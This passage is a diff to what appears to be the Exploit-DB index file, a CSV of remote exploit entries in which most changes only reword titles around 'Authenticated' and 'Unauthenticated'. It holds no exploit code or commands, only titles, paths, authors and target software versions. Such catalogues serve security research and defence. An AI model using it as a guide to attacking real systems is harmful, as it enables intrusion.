cgi-bin Remote Code Execution",2013-10-29,kingcope,remote,php,80 29302,exploits/linux/remote/29302.txt,"Mono XSP 1.x/2.0 - Source Code Information Disclosure",2006-12-20,jose.palanco,remote,linux, 29316,exploits/php/remote/29316.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner",2013-10-31,noptrix,remote,php, -29319,exploits/php/remote/29319.rb,"vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 +29319,exploits/php/remote/29319.rb,"vTiger CRM 5.3.0 5.4.0 - (Authenticated) Remote Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 29320,exploits/php/remote/29320.rb,"NAS4Free - Remote Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 -29321,exploits/linux/remote/29321.rb,"Zabbix - Authenticated Remote Command Execution (Metasploit)",2013-10-31,Metasploit,remote,linux,80 -29322,exploits/php/remote/29322.rb,"ISPConfig - Authenticated Arbitrary PHP Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 +29321,exploits/linux/remote/29321.rb,"Zabbix - (Authenticated) Remote Command Execution (Metasploit)",2013-10-31,Metasploit,remote,linux,80 +29322,exploits/php/remote/29322.rb,"ISPConfig - (Authenticated) Arbitrary PHP Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 29323,exploits/linux/remote/29323.rb,"OpenMediaVault Cron - Remote Command Execution (Metasploit)",2013-10-31,Metasploit,remote,linux,80 29324,exploits/linux/remote/29324.rb,"Moodle - Remote Command Execution (Metasploit)",2013-10-31,Metasploit,remote,linux,80 -29325,exploits/php/remote/29325.rb,"ProcessMaker Open Source - Authenticated PHP Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 +29325,exploits/php/remote/29325.rb,"ProcessMaker Open Source - (Authenticated) PHP Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 30186,exploits/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow",2007-06-12,"Cody Pierce",remote,linux, 29371,exploits/multiple/remote/29371.txt,"Oracle 10g Portal - 'Key' Cross-Site Scripting",2006-12-29,"Pham Duc Hai",remote,multiple, 29383,exploits/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin - Cross-Site Scripting",2007-01-03,"Stefano Di Paola",remote,linux, @@ -14926,7 +14926,7 @@ id,file,description,date,author,type,platform,port 31149,exploits/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",remote,windows, 31163,exploits/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",remote,windows, 40760,exploits/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - Remote Overflow (SEH) (Metasploit)",2016-11-15,"Tracy Turben",remote,windows, -31683,exploits/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,remote,hardware, +31683,exploits/hardware/remote/31683.php,"Linksys E-series - Remote Code Execution",2014-02-16,Rew,remote,hardware, 31179,exploits/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Remote Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",remote,windows, 31181,exploits/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,remote,windows,5555 31204,exploits/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",remote,windows, @@ -14956,7 +14956,7 @@ id,file,description,date,author,type,platform,port 31409,exploits/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'Filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",remote,windows, 31412,exploits/osx/remote/31412.txt,"Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",remote,osx, 31432,exploits/linux/remote/31432.rb,"Skybluecanvas CMS - Remote Code Execution (Metasploit)",2014-02-05,Metasploit,remote,linux, -31433,exploits/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution (Metasploit)",2014-02-05,Metasploit,remote,multiple,80 +31433,exploits/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload (Authenticated) Code Execution (Metasploit)",2014-02-05,Metasploit,remote,multiple,80 31434,exploits/java/remote/31434.rb,"Apache Struts - Developer Mode OGNL Execution (Metasploit)",2014-02-05,Metasploit,remote,java,8080 31473,exploits/osx/remote/31473.html,"Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing",2008-03-22,"Juan Pablo Lopez Yacubian",remote,osx, 31474,exploits/windows/remote/31474.py,"Mitsubishi Electric GB-50A - Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",remote,windows, @@ -15124,15 +15124,15 @@ id,file,description,date,author,type,platform,port 32738,exploits/ios/remote/32738.txt,"Bluetooth Text Chat 1.0 iOS - Code Execution",2014-04-08,Vulnerability-Lab,remote,ios, 32743,exploits/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Vulnerabilities",2014-04-08,"Juan Manuel Garcia",remote,hardware, 32745,exploits/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure",2014-04-08,"Jared Stafford",remote,multiple,443 -32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Unauthenticated Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware, +32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware, 32762,exploits/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - 'Username' Enumeration",2009-01-27,"Marco Mella",remote,multiple, 32764,exploits/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions)",2014-04-09,"Fitzl Csaba",remote,multiple,443 32776,exploits/hardware/remote/32776.txt,"Cisco IOS 12.4(23) - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,remote,hardware, 32780,exploits/linux/remote/32780.py,"PyCrypto ARC2 Module - Remote Buffer Overflow",2009-02-07,"Mike Wiacek",remote,linux, 32781,exploits/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",remote,multiple, -32789,exploits/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface - Authenticated Arbitrary Command Execution (Metasploit)",2014-04-10,Metasploit,remote,unix,443 +32789,exploits/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface - (Authenticated) Arbitrary Command Execution (Metasploit)",2014-04-10,Metasploit,remote,unix,443 32791,exploits/multiple/remote/32791.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (1)",2014-04-10,prdelka,remote,multiple,443 -32794,exploits/php/remote/32794.rb,"Vtiger - 'Install' Unauthenticated Remote Command Execution (Metasploit)",2014-04-10,Metasploit,remote,php,80 +32794,exploits/php/remote/32794.rb,"Vtiger - 'Install' Remote Command Execution (Metasploit)",2014-04-10,Metasploit,remote,php,80 32795,exploits/novell/remote/32795.txt,"Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",remote,novell, 32796,exploits/linux/remote/32796.txt,"Swann DVR4 SecuraNet - Directory Traversal",2009-02-10,"Terry Froy",remote,linux, 32798,exploits/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection",2009-02-10,AlpHaNiX,remote,multiple, @@ -15151,7 +15151,7 @@ id,file,description,date,author,type,platform,port 32877,exploits/multiple/remote/32877.txt,"Xlight FTP Server 3.2 - 'user' SQL Injection",2009-03-19,fla,remote,multiple, 32878,exploits/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN - Cross-Site Scripting",2009-03-31,"Bugs NotHugs",remote,hardware, 32879,exploits/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",remote,windows, -32885,exploits/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root Remote Code Execution (Metasploit)",2014-04-15,"Brandon Perry",remote,unix,443 +32885,exploits/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Root Remote Code Execution (Metasploit)",2014-04-15,"Brandon Perry",remote,unix,443 32998,exploits/multiple/remote/32998.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support)",2014-04-24,"Ayman Sagy",remote,multiple, 32997,exploits/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Overflow",2014-04-24,An7i,remote,windows, 32919,exploits/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",remote,hardware, @@ -15380,8 +15380,8 @@ id,file,description,date,author,type,platform,port 33974,exploits/windows/remote/33974.txt,"Mereo 1.9.1 - Directory Traversal",2010-05-09,"John Leitch",remote,windows, 33980,exploits/windows/remote/33980.txt,"Best Way GEM Engine - Multiple Vulnerabilities",2009-10-12,"Luigi Auriemma",remote,windows, 33981,exploits/windows/remote/33981.txt,"GameCore 2.5 - 'GameID' Integer Overflow",2010-05-13,"Luigi Auriemma",remote,windows, -33990,exploits/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution (Metasploit)",2014-07-07,Metasploit,remote,multiple,80 -33991,exploits/php/remote/33991.rb,"WordPress Plugin MailPoet Newsletters 2.6.8 - 'wysija-newsletters' Unauthenticated Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,remote,php,80 +33990,exploits/multiple/remote/33990.rb,"Gitlist - Remote Command Execution (Metasploit)",2014-07-07,Metasploit,remote,multiple,80 +33991,exploits/php/remote/33991.rb,"WordPress Plugin MailPoet Newsletters 2.6.8 - 'wysija-newsletters' Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,remote,php,80 34002,exploits/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",remote,windows, 34009,exploits/windows/remote/34009.rb,"Yokogawa CS3000 - 'BKFSim_vhfd.exe' Remote Buffer Overflow (Metasploit)",2014-07-08,Metasploit,remote,windows,20010 34013,exploits/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 - 'systemWebAdminConfig.do' Remote Security Bypass",2010-05-19,"Nahuel Grisolia",remote,windows, @@ -15394,7 +15394,7 @@ id,file,description,date,author,type,platform,port 34059,exploits/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET (SEH)",2014-07-14,"Revin Hadi Saputra",remote,windows, 34063,exploits/hardware/remote/34063.rb,"D-Link Devices - 'info.cgi' POST Buffer Overflow (Metasploit)",2014-07-14,Metasploit,remote,hardware,80 34064,exploits/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,remote,hardware,80 -34065,exploits/hardware/remote/34065.rb,"D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,remote,hardware,1900 +34065,exploits/hardware/remote/34065.rb,"D-Link Devices - UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,remote,hardware,1900 34066,exploits/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,remote,windows, 34088,exploits/android/remote/34088.html,"Boat Browser 8.0/8.0.1 - Remote Code Execution",2014-07-16,c0otlass,remote,android, 34156,exploits/windows/remote/34156.pl,"TurboFTP Server 1.20.745 - Directory Traversal",2010-06-17,leinakesi,remote,windows, @@ -15428,7 +15428,7 @@ id,file,description,date,author,type,platform,port 34358,exploits/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Remote Buffer Overflow",2010-07-20,J23,remote,linux, 34369,exploits/multiple/remote/34369.txt,"IBM Java - UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,remote,multiple, 34372,exploits/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection",2009-11-01,"Davide Canali",remote,multiple, -34465,exploits/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,remote,hardware,22 +34465,exploits/hardware/remote/34465.txt,"F5 Big-IP - rsync Access",2014-08-29,Security-Assessment.com,remote,hardware,22 34385,exploits/linux/remote/34385.txt,"KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution",2010-07-28,unic0rn,remote,linux, 34390,exploits/php/remote/34390.rb,"HybridAuth - 'install.php' PHP Code Execution (Metasploit)",2014-08-21,Metasploit,remote,php,80 34399,exploits/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",remote,ios, @@ -15443,7 +15443,7 @@ id,file,description,date,author,type,platform,port 40339,exploits/linux/remote/40339.py,"glibc - 'getaddrinfo' Remote Stack Buffer Overflow",2016-09-06,SpeeDr00t,remote,linux, 34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,remote,multiple, 34507,exploits/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",remote,linux, -34517,exploits/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,remote,windows,5466 +34517,exploits/windows/remote/34517.rb,"Wing FTP Server - (Authenticated) Command Execution (Metasploit)",2014-09-01,Metasploit,remote,windows,5466 34523,exploits/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",remote,multiple, 34532,exploits/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Executions",2010-08-25,storm,remote,windows, 34542,exploits/windows/remote/34542.c,"UltraVNC 1.0.8.2 - DLL Loading Arbitrary Code Execution",2010-08-30,"Ivan Markovic",remote,windows, @@ -15586,7 +15586,7 @@ id,file,description,date,author,type,platform,port 35427,exploits/bsd/remote/35427.py,"tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side",2014-12-02,dash,remote,bsd, 35433,exploits/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,remote,osx, 35434,exploits/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",remote,windows, -35441,exploits/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow (Metasploit)",2014-12-02,Metasploit,remote,multiple,655 +35441,exploits/multiple/remote/35441.rb,"Tincd - (Authenticated) Remote TCP Stack Buffer Overflow (Metasploit)",2014-12-02,Metasploit,remote,multiple,655 35446,exploits/windows/remote/35446.pl,"Microsoft Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,remote,windows, 35474,exploits/windows/remote/35474.py,"Microsoft Windows Kerberos - Privilege Escalation (MS14-068)",2014-12-05,"Sylvain Monne",remote,windows, 35464,exploits/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 - URI SecURIty Bypass",2011-03-14,"DcLabs Security Research Group",remote,multiple, @@ -15615,7 +15615,7 @@ id,file,description,date,author,type,platform,port 35641,exploits/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService?RENDER_MAFLET' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",remote,multiple, 35642,exploits/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService?jdemafjasLinkTarget' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",remote,multiple, 35644,exploits/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,remote,linux, -35652,exploits/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution",2014-12-30,drone,remote,windows, +35652,exploits/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Remote Code Execution",2014-12-30,drone,remote,windows, 35660,exploits/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload (Metasploit)",2014-12-31,Metasploit,remote,php,80 35685,exploits/multiple/remote/35685.txt,"Asterisk 1.8.x - SIP INVITE Request User Enumeration",2011-05-02,"Francesco Tornieri",remote,multiple, 35686,exploits/windows/remote/35686.pl,"OpenMyZip 0.1 - '.zip' Remote Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",remote,windows, @@ -15652,9 +15652,9 @@ id,file,description,date,author,type,platform,port 35818,exploits/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Cross-Site Scripting",2011-06-01,"Stefan Schurtz",remote,multiple, 35822,exploits/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",remote,windows, 35836,exploits/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,remote,linux, -35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware, +35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware, 35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,remote,hardware, -35845,exploits/java/remote/35845.rb,"ManageEngine (Multiple Products) - Authenticated Arbitrary File Upload (Metasploit)",2015-01-20,Metasploit,remote,java,8080 +35845,exploits/java/remote/35845.rb,"ManageEngine (Multiple Products) - (Authenticated) Arbitrary File Upload (Metasploit)",2015-01-20,Metasploit,remote,java,8080 35855,exploits/php/remote/35855.txt,"PHP 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",remote,php, 35864,exploits/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",remote,windows, 35880,exploits/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",remote,windows, @@ -15665,7 +15665,7 @@ id,file,description,date,author,type,platform,port 35892,exploits/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 - SQL Injection",2011-06-27,"Qihan Luo",remote,multiple, 35897,exploits/windows/remote/35897.html,"CygniCon CyViewer - ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",remote,windows, 35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple, -35917,exploits/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change",2015-01-27,"Todor Donev",remote,hardware, +35917,exploits/hardware/remote/35917.txt,"D-Link DSL-2740R - Remote DNS Change",2015-01-27,"Todor Donev",remote,hardware, 35918,exploits/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",remote,multiple, 35919,exploits/bsd/remote/35919.c,"NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows",2011-07-01,"Maksymilian Arciemowicz",remote,bsd, 35921,exploits/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,remote,windows, @@ -15680,7 +15680,7 @@ id,file,description,date,author,type,platform,port 36004,exploits/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' HTML Injection",2011-08-01,noptrix,remote,multiple, 36006,exploits/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",remote,multiple, 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple, -36014,exploits/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure",2015-02-07,"Todor Donev",remote,hardware, +36014,exploits/hardware/remote/36014.pl,"LG DVR LE6016D - Remote Users/Passwords Disclosure",2015-02-07,"Todor Donev",remote,hardware, 36016,exploits/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",remote,multiple, 36020,exploits/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",remote,windows, 36045,exploits/cgi/remote/36045.txt,"SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",remote,cgi, @@ -15701,7 +15701,7 @@ id,file,description,date,author,type,platform,port 36205,exploits/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",remote,hardware, 36206,exploits/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)",2015-02-27,"Ben Turner",remote,windows,3465 36209,exploits/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",remote,windows, -36263,exploits/linux/remote/36263.rb,"Symantec Web Gateway 5 - 'restore.php' Authenticated Command Injection (Metasploit)",2015-03-04,Metasploit,remote,linux,443 +36263,exploits/linux/remote/36263.rb,"Symantec Web Gateway 5 - 'restore.php' (Authenticated) Command Injection (Metasploit)",2015-03-04,Metasploit,remote,linux,443 36217,exploits/windows/remote/36217.txt,"GoAhead Web Server 2.18 - 'addgroup.asp?group' Cross-Site Scripting",2011-10-10,"Silent Dream",remote,windows, 36218,exploits/windows/remote/36218.txt,"GoAhead Web Server 2.18 - 'addlimit.asp?url' Cross-Site Scripting",2011-10-10,"Silent Dream",remote,windows, 36219,exploits/windows/remote/36219.txt,"GoAhead Web Server 2.18 - 'adduser.asp' Multiple Cross-Site Scripting Vulnerabilities",2011-10-10,"Silent Dream",remote,windows, @@ -15712,12 +15712,12 @@ id,file,description,date,author,type,platform,port 36250,exploits/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,remote,windows, 36256,exploits/hardware/remote/36256.txt,"Cisco - 'file' Directory Traversal",2011-10-26,"Sandro Gauci",remote,hardware, 36258,exploits/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,remote,windows, -36264,exploits/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,remote,php,80 +36264,exploits/php/remote/36264.rb,"Seagate Business NAS - Remote Command Execution (Metasploit)",2015-03-04,Metasploit,remote,php,80 36291,exploits/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",remote,windows, 36304,exploits/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution (Metasploit)",2015-03-06,Metasploit,remote,windows,5555 36318,exploits/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",remote,windows, 36319,exploits/windows/remote/36319.txt,"GoAhead Web Server 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",remote,windows, -36337,exploits/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",remote,linux,9200 +36337,exploits/linux/remote/36337.py,"ElasticSearch - Remote Code Execution",2015-03-11,"Xiphos Research Ltd",remote,linux,9200 36352,exploits/linux/remote/36352.txt,"Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",remote,linux, 36360,exploits/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,remote,windows, 36370,exploits/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",remote,linux, @@ -15766,7 +15766,7 @@ id,file,description,date,author,type,platform,port 36679,exploits/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,remote,windows, 36680,exploits/hardware/remote/36680.txt,"Trendnet Camera (Multiple Products) - Remote Security Bypass",2012-02-10,console-cowboys,remote,hardware, 36681,exploits/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Information Disclosure",2012-02-09,"Paul Nicolucci",remote,multiple, -36690,exploits/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution (Metasploit)",2015-04-09,xort,remote,linux,8000 +36690,exploits/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - (Authenticated) Remote Command Execution (Metasploit)",2015-04-09,xort,remote,linux,8000 36742,exploits/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,remote,linux, 36744,exploits/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,remote,windows, 36756,exploits/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",remote,windows, @@ -15901,7 +15901,7 @@ id,file,description,date,author,type,platform,port 38248,exploits/multiple/remote/38248.txt,"Multiple Hunt CCTV - Information Disclosure",2013-01-29,"Alejandro Ramos",remote,multiple, 38250,exploits/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",remote,multiple, 38252,exploits/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,remote,windows,21 -38254,exploits/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Authenticated CWD Command Overflow (SEH) (Metasploit)",2015-09-21,Metasploit,remote,windows,21 +38254,exploits/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - (Authenticated) CWD Command Overflow (SEH) (Metasploit)",2015-09-21,Metasploit,remote,windows,21 38260,exploits/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,remote,windows,21 38302,exploits/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution (Metasploit)",2015-09-23,Metasploit,remote,multiple,6667 38308,exploits/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",remote,hardware, @@ -15935,7 +15935,7 @@ id,file,description,date,author,type,platform,port 38495,exploits/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",remote,hardware, 38500,exploits/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",remote,windows, 38501,exploits/hardware/remote/38501.txt,"Cisco Linksys E4200 - '/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-04-27,"Carl Benedict",remote,hardware, -38505,exploits/php/remote/38505.rb,"Zpanel - Unauthenticated Remote Code Execution (Metasploit)",2015-10-21,Metasploit,remote,php, +38505,exploits/php/remote/38505.rb,"Zpanel - Remote Code Execution (Metasploit)",2015-10-21,Metasploit,remote,php, 38512,exploits/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",remote,windows, 38513,exploits/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion / Remote Code Execution",2015-10-22,Scurippio,remote,windows, 38521,exploits/multiple/remote/38521.c,"Python RRDtool Module - Function Format String",2013-05-18,"Thomas Pollet",remote,multiple, @@ -16005,7 +16005,7 @@ id,file,description,date,author,type,platform,port 38827,exploits/php/remote/38827.txt,"Nagios XI - 'tfPassword' SQL Injection",2013-12-13,"Denis Andzakovic",remote,php, 38829,exploits/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass + ROP)",2015-11-30,Knaps,remote,windows, 36025,exploits/windows/remote/36025.py,"Achat 0.150 beta7 - Remote Buffer Overflow",2015-02-08,"KAhara MAnhara",remote,windows, -38845,exploits/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",remote,multiple, +38845,exploits/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",remote,multiple, 38846,exploits/multiple/remote/38846.txt,"Nginx 1.1.17 - URI Processing SecURIty Bypass",2013-11-19,"Ivan Fratric",remote,multiple, 